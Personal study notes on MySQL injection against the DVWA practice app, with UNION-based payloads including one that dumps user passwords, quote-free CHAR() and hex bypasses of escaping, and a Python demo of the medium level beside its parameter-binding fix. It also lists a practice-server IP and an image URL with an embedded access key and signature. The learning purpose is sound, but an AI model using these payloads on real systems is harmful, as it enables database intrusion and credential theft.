Unc1e
MySQL injection notes

MySQL injection

Practice

DVWA-SQLi

http://43.247.91.228:81/login.php
  1. Vulnerability: SQL Injection
  • low
    omitted
  • medium
    The input is escaped: $id = $_GET['id']; $id = mysql_real_escape_string($id); but it is then used unquoted in the query, so a numeric-context payload such as id=1 UNION SELECT 1,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES still works. Because the number of returned rows is not limited, every table name comes back. A few points to note:
    1. String literals such as the database or table name 'dvwa' cannot be written with quotes (the escape turns ' into \'), so they must be expressed indirectly:
    • CHAR(100, 118, 119, 97)
    • hex-encoded: 0x64767761
  • high $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; How do we get past the trailing LIMIT 1? Comment it out. "--" did not work, but "#" does. (In MySQL the "--" comment style only counts as a comment when at least one whitespace character follows the dashes, so a bare "--" at the end of the input is not a comment; "#" has no such requirement.)
    payload: ' union select first_name,password from users#
  • impossible
    1. anti-CSRF token
    2. id taken from $_SESSION
    3. PDO prepared statement with bound parameters
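The medium and impossible levels replayed against an in-memory SQLite database, as an added example that is not DVWA's own code. It shows why escaping does nothing for an unquoted numeric parameter, why a quoted literal like 'users' breaks once escaped, and why the CHAR() form of the same string gets through. Assumptions: SQLite stands in for MySQL, so sqlite_master plays the role of INFORMATION_SCHEMA.TABLES and SQLite's char() the role of MySQL's CHAR(); MySQL's 0x... hex literal has no exact SQLite equivalent, so to_hex_literal() only builds that text and is not executed; the users/guestbook rows are constructed sample data.

```python
"""Added example (not DVWA's own code): the medium and impossible levels
replayed against an in-memory SQLite database.

Assumptions: SQLite stands in for MySQL, so sqlite_master plays the role of
INFORMATION_SCHEMA.TABLES and SQLite's char() the role of MySQL's CHAR().
MySQL's 0x... hex literal has no exact SQLite equivalent, so to_hex_literal()
only builds the text of that form and is not executed here.
"""
import sqlite3


def mysql_real_escape_string(s: str) -> str:
    """Emulate PHP's mysql_real_escape_string(): backslash-escape the characters
    that could end a quoted literal. It never adds quotes of its own."""
    table = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def to_char_literal(s: str) -> str:
    """'dvwa' -> CHAR(100, 118, 119, 97): the string without any quote character."""
    return "CHAR(" + ", ".join(str(ord(c)) for c in s) + ")"


def to_hex_literal(s: str) -> str:
    """'dvwa' -> 0x64767761: MySQL's hex-literal form of the same string."""
    return "0x" + s.encode().hex()


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for DVWA's dvwa.users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin', 'hash-1');
        INSERT INTO users VALUES (2, 'Gordon', 'Brown', 'hash-2');
        CREATE TABLE guestbook(comment_id INTEGER, comment TEXT, name TEXT);
    """)
    return conn


def run_medium(conn: sqlite3.Connection, user_id: str):
    """DVWA 'medium': the input is escaped, then used UNQUOTED in the query.
    Returns ("ok", rows) or ("error", message)."""
    escaped = mysql_real_escape_string(user_id)
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {escaped};"
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error", str(exc)


def run_impossible(conn: sqlite3.Connection, user_id: str):
    """DVWA 'impossible' in spirit: reject non-numeric input and bind the value
    as a parameter, so the database never parses user data as SQL."""
    if not user_id.isdigit():
        return []
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1;"
    return conn.execute(sql, (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Analogue of id=1 UNION SELECT 1,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
    print(run_medium(db, "1 UNION SELECT 1,name FROM sqlite_master"))
    # A quoted literal breaks: the escape turns 'users' into \'users\'
    print(run_medium(db, "1 UNION SELECT 1,name FROM sqlite_master WHERE name='users'"))
    # The CHAR() encoding contains no quotes, so it survives the escaping
    print(run_medium(db, "1 UNION SELECT 1,name FROM sqlite_master WHERE name="
                         + to_char_literal("users")))
    # The bound parameter never reaches the parser as SQL
    print(run_impossible(db, "1 UNION SELECT 1,name FROM sqlite_master"))
```

The escape emulation is the point of the exercise: mysql_real_escape_string() only protects data that sits inside a quoted literal, which is exactly what the medium level does not do, and the impossible level fixes it by binding the value rather than escaping it.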

experience

https://henry-wp-backup.oss-cn-shenzhen.aliyuncs.com/Wordpress/WEB_PENETRATION/SQL_STRUCTUTRE.png
MySQL table structure

Basic steps

  • Python:
    Before running the script, the injected parameter should be placed at the TAIL of the URL, i.e. change
    ?id=1%20UNION%20SELECT%201,user()&Submit=Submit# to ?Submit=Submit&id=1%20UNION%20SELECT%201,user()
    so that the payload, and anything appended to it, is the last thing in the query string. Note that a raw "#" at the end of a URL starts the fragment and is never sent to the server; a "#" that belongs to the payload must be percent-encoded as %23.

The result looks like this:

https://henry-wp-backup.oss-cn-shenzhen.aliyuncs.com/Wordpress/WEB_PENETRATION/sqli_fuzz/auto_fuzzing.png?Expires=1559386369&OSSAccessKeyId=TMP.AgEjr8ZSFQHB_1KT68zkzj3Vo6YmuGNUzcFI6IL1o9amWhm8w7s4l0xrs-dIADAtAhUAx5qCih6-yseL7gL6j-RgVIzK6uACFC_4KbGTLu1ZobZOzaKVV3yHfyTI&Signature=p%2FfWhyVw1SZjNMIl%2B99gwXiOy6A%3D
  • Programming notes
    1. Python regex
      • re.findall(pattern, string) returns every non-overlapping match, which is what extracts the values from a response
      • re.match(pattern, string) only matches at the beginning of the string; use re.search(pattern, string) to find the pattern anywhere in it

Reasons of sqli

  1. User-supplied parameters are concatenated into the query and sent to the database WITHOUT validation or filtering: $_GET
    $_POST
    $_REQUEST
  2. The query result (or its error) must be visible in the response for the injected data to come back, e.g. when the page does
    > echo($query)
    > echo…


These notes are for reviewing my own learning. Since switching input methods is inconvenient, they are mostly written in English; readers who come across an unfamiliar word, please look it up yourselves. Thanks for reading! Also, for my own convenience they are written in reverse order, so the newest content comes first.
2019-06-01